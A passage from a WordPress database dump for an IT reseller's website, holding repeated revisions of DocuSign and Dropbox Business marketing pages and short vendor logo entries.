	<li>Full digital audit trail for easy compliance and legal enforceability</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div>\r\n<div>\r\n<div>\r\n<div class=\"row\">\r\n<div class=\"col-xs-12 col-sm-4\"></div>\r\n<div class=\"col-xs-12 col-sm-4\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','DocuSign','','inherit','closed','closed','','1481-revision-v1','','','2018-12-12 12:56:51','2018-12-12 04:56:51','',1481,'https://bintara.com.my/blog/2018/12/12/1481-revision-v1/',0,'revision','',0),(1876,1,'2018-12-12 12:57:28','2018-12-12 04:57:28','Projectors and Printers<!--more-->\n\n<img class=\"alignnone size-full wp-image-1675\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','EPSON','','inherit','closed','closed','','1376-autosave-v1','','','2018-12-12 12:57:28','2018-12-12 04:57:28','',1376,'https://bintara.com.my/blog/2018/12/12/1376-autosave-v1/',0,'revision','',0),(1877,1,'2018-12-12 12:58:30','2018-12-12 04:58:30','<h2>DocuSign</h2>\r\n<h3>Grow your business.\r\nShrink your paperwork.</h3>\r\n<h3>Delight customers with an easier way to do business</h3>\r\nWhy do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.\r\n<h3><img class=\"media-element file-default\" src=\"https://www.docusign.com/sites/default/files/keybenefits-1.png\" alt=\"DocuSign signing experience in mobile device\" width=\"438\" height=\"212\" data-delta=\"1\" /></h3>\r\n<h3>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes</h3>\r\nWith the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature,Â collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.\r\n<h3><img class=\"media-element file-default\" src=\"https://www.docusign.com/sites/default/files/smb-keybenefits-2-2_07.png\" alt=\"\" width=\"392\" height=\"184\" data-delta=\"1\" /></h3>\r\n<h3>Works with the applications, services and devices your business already uses</h3>\r\nDocuSign fits right into your existing systems so youâ€™ll be productive, instantly.Â Use DocuSign with over 300 popular servicesÂ like Google, Salesforce and Box, orÂ access our award-winning appÂ from practically any mobile device. Works with virtually any kind of document.\r\n<h3><img class=\"media-element file-default\" src=\"https://www.docusign.com/sites/default/files/SMB.png\" alt=\"\" width=\"460\" height=\"144\" data-delta=\"3\" /></h3>\r\n<h3>The reliable, globally-trusted service for electronic signatures</h3>\r\nHundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.\r\n<h2></h2>\r\n<h3>Do more with the #1 eSignature platform for business</h3>\r\n<ul>\r\n 	<li>Simple and fast setup gets you started immediately</li>\r\n 	<li>99.99% platform availability keeps your business running at all hours</li>\r\n 	<li>Flexible workflows to automate any agreement or approval process</li>\r\n 	<li>Rigorous security standards keep sensitive documents safe</li>\r\n 	<li>Instant visibility into document status and powerful reporting</li>\r\n 	<li>Full digital audit trail for easy compliance and legal enforceability</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div>\r\n<div>\r\n<div>\r\n<div class=\"row\">\r\n<div class=\"col-xs-12 col-sm-4\"></div>\r\n<div class=\"col-xs-12 col-sm-4\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','DocuSign','','inherit','closed','closed','','1481-revision-v1','','','2018-12-12 12:58:30','2018-12-12 04:58:30','',1481,'https://bintara.com.my/blog/2018/12/12/1481-revision-v1/',0,'revision','',0),(1879,1,'2018-12-12 14:06:01','2018-12-12 06:06:01','Classroom Management, Endpoint Management. Read More...\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1825\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Faronics-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','FARONICS','','inherit','closed','closed','','1380-autosave-v1','','','2018-12-12 14:06:01','2018-12-12 06:06:01','',1380,'https://bintara.com.my/blog/2018/12/12/1380-autosave-v1/',0,'revision','',0),(1880,1,'2018-12-12 14:13:31','2018-12-12 06:13:31','<a href=\"https://bintara.com.my/fujixerox/\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1826\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Fuji-Xerox-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','FUJI XEROX','','inherit','closed','closed','','1383-autosave-v1','','','2018-12-12 14:13:31','2018-12-12 06:13:31','',1383,'https://bintara.com.my/blog/2018/12/12/1383-autosave-v1/',0,'revision','',0),(1886,1,'2018-12-12 14:27:21','2018-12-12 06:27:21','&nbsp;\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1685\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Kingston-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','KINGSTON','','inherit','closed','closed','','1396-autosave-v1','','','2018-12-12 14:27:21','2018-12-12 06:27:21','',1396,'https://bintara.com.my/blog/2018/12/12/1396-autosave-v1/',0,'revision','',0),(1883,1,'2018-12-12 14:19:43','2018-12-12 06:19:43','Servers and Systems, Networking and Data Storage. <a href=\"http://bintara.com.my/hpe\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1828\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','HPE','','inherit','closed','closed','','1387-autosave-v1','','','2018-12-12 14:19:43','2018-12-12 06:19:43','',1387,'https://bintara.com.my/blog/2018/12/12/1387-autosave-v1/',0,'revision','',0),(1884,1,'2018-12-12 14:21:36','2018-12-12 06:21:36','Read','HUAWEI','','inherit','closed','closed','','1388-autosave-v1','','','2018-12-12 14:21:36','2018-12-12 06:21:36','',1388,'https://bintara.com.my/blog/2018/12/12/1388-autosave-v1/',0,'revision','',0),(1885,1,'2018-12-12 14:23:57','2018-12-12 06:23:57','<a href=\"http://bintara.com.my/ibm\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1830\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/IBM-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','IBM','','inherit','closed','closed','','1389-autosave-v1','','','2018-12-12 14:23:57','2018-12-12 06:23:57','',1389,'https://bintara.com.my/blog/2018/12/12/1389-autosave-v1/',0,'revision','',0),(1887,1,'2018-12-12 14:29:44','2018-12-12 06:29:44','<h3 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h3>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\n\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\n\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n\r\n</div>\r\n</div>\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\n\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\n\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\n\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\n\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\n\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\n\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\n\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\n\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\n\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\n\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\n\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\n\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n&nbsp;\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2018-12-12 14:29:44','2018-12-12 06:29:44','',1473,'https://bintara.com.my/blog/2018/12/12/1473-revision-v1/',0,'revision','',0),(1891,1,'2018-12-12 14:32:21','2018-12-12 06:32:21','','download','','inherit','closed','closed','','download','','','2018-12-12 14:32:21','2018-12-12 06:32:21','',1473,'https://bintara.com.my/wp-content/uploads/2018/12/download.png',0,'attachment','image/png',0),(3442,1,'2019-09-25 16:14:49','2019-09-25 08:14:49','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n&nbsp;\r\n<h2>Features</h2>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h2>\r\n\r\n<strong>File backup</strong>\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n\r\n<strong>Team collaboration</strong>\r\nStay productive with new ways to easily share work and collect feedback.\r\n\r\n<strong>Administrative tools</strong>\r\nTeam management stays simple from a central location, the admin console.\r\n\r\n<strong>Security features</strong>\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:14:49','2019-09-25 08:14:49','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(1892,1,'2018-12-12 14:33:01','2018-12-12 06:33:01','<h3><img class=\"alignnone  wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"517\" height=\"62\" /></h3>\r\n<h3 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h3>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\n\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\n\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n\r\n</div>\r\n</div>\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\n\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\n\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\n\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\n\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\n\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\n\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\n\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\n\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\n\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\n\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\n\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\n\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n&nbsp;\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2018-12-12 14:33:01','2018-12-12 06:33:01','',1473,'https://bintara.com.my/blog/2018/12/12/1473-revision-v1/',0,'revision','',0),(3441,1,'2019-09-25 16:14:17','2019-09-25 08:14:17','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n&nbsp;\r\n<h2>Features</h2>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h2>\r\n\r\n<strong>File backup</strong>\r\n<div class=\"a23-media-block__description\">\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n\r\n<strong>Team collaboration</strong>\r\n<div class=\"a23-media-block__description\">\r\nStay productive with new ways to easily share work and collect feedback.\r\n\r\n<strong>Administrative tools</strong>\r\n<div class=\"a23-media-block__description\">\r\nTeam management stays simple from a central location, the admin console.\r\n\r\n<strong>Security features</strong>\r\n<div class=\"a23-media-block__description\">\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:14:17','2019-09-25 08:14:17','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(1893,1,'2018-12-12 14:34:33','2018-12-12 06:34:33','<h3><img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"517\" height=\"62\" /></h3>\r\n<h3 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h3>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\n\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\n\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\n\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\n\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\n\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\n\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\n\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\n\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\n\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\n\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\n\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\n\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\n\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\n\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n&nbsp;\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2018-12-12 14:34:33','2018-12-12 06:34:33','',1473,'https://bintara.com.my/blog/2018/12/12/1473-revision-v1/',0,'revision','',0),(3435,1,'2019-09-25 16:08:29','2019-09-25 08:08:29','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:08:29','2019-09-25 08:08:29','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(1894,1,'2018-12-12 14:36:33','2018-12-12 06:36:33','<h3><img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"517\" height=\"62\" /></h3>\r\n<h3 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h3>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\n\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\n\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\n\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\n\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\n\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\n\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\n\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\n\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\n\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\n\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\n\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\n\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\n\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\n\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n&nbsp;\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2018-12-12 14:36:33','2018-12-12 06:36:33','',1473,'https://bintara.com.my/blog/2018/12/12/1473-revision-v1/',0,'revision','',0),(1897,1,'2018-12-12 14:40:26','2018-12-12 06:40:26','<h3><img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"517\" height=\"62\" /></h3>\r\n<h3 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h3>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\n\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\n\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\n\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\n\r\nEasily recover deleted files and restore previous file 